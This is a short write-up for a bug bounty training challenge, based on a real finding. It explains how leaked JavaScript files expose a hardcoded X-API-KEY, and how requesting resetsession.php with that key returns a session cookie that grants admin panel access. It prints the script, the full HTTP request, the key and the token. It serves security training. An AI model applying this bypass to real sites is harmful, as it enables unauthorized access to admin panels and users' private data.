BugBountyHunter

This is based on a real P1 finding which allowed me into an admin panel and allowed me to enumerate users private information. All of their API endpoints were contained in .js files.

Viewing the source of the page you'll discover /app.js which shows:

/*
$.ajax({
    url: 'redirect.php',
    type: 'POST',
    data: 'username=' + uname + '&pwd=' + pwd,

    success: function(result) {
       window.location.href="/adminhome.php";

    }
});
*/

However you already know about that request, what's interesting is where it redirects to if successful!

Onwards to visit /adminhome.php Oh wait. We get redirected. But did you notice it was a META REFRESH, and some HTML was in the response? Let's investigate.

In the <head> you will find admin.js which reveals:

function resetSession() {
    function reqListener () {
       document.cookie = "thesesh="+this.responseText;
       location.reload();
    }

    var oReq = new XMLHttpRequest();
    oReq.addEventListener("load", reqListener);
    oReq.open("GET", "http://www.bugbountytraining.com/challenges/AdminPanel/resetsession.php");
    oReq.setRequestHeader("X-API-KEY","3a24b51d-3b36-4e45-8f95-8903cd813611");
    oReq.send();
}

Interesting. So sending a request to /resetsession.php with the header X-API-KEY: we can reset the session? Let's try this!

GET /challenges/AdminPanel/resetsession.php HTTP/1.1
Host: www.bugbountytraining.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
X-API-KEY:3a24b51d-3b36-4e45-8f95-8903cd813611

Response: cXp1QjF4aFRwcjM3RW01anA5YkVmQT09

And from there we can see the code sets this as the value for the cookie, thesesh.

Set this as your cookie and you're in!